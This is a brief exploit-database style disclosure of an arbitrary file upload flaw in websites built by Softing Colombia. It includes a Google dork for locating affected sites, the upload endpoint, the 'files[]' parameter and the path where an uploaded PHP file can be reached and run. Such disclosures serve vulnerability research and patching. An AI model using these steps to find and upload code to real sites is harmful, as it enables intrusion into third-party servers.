# Exploit Title: Developed Softing Colombia - Arbitrary File Upload
# Google Dork: intext:"Desarrollado por Softing Colombia"
# Date: 17 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu
Proof of Concept
1. Check Vulnerability.
https://web-target/server/php/
View image : https://4.bp.blogspot.com/-kqtd7NSsEwY/WjWI4FmXGQI/AAAAAAAAABk/nHLqGgIM9pAMg5gCVtLyb9v8VGF1oRczwCLcBGAs/s1600/Screenshot%2Bfrom%2B2017-12-17%2B03-55-43.png
2. Array type Upload : files[]
3. Check file uploaded.
https://web-target/server/php/files/file.php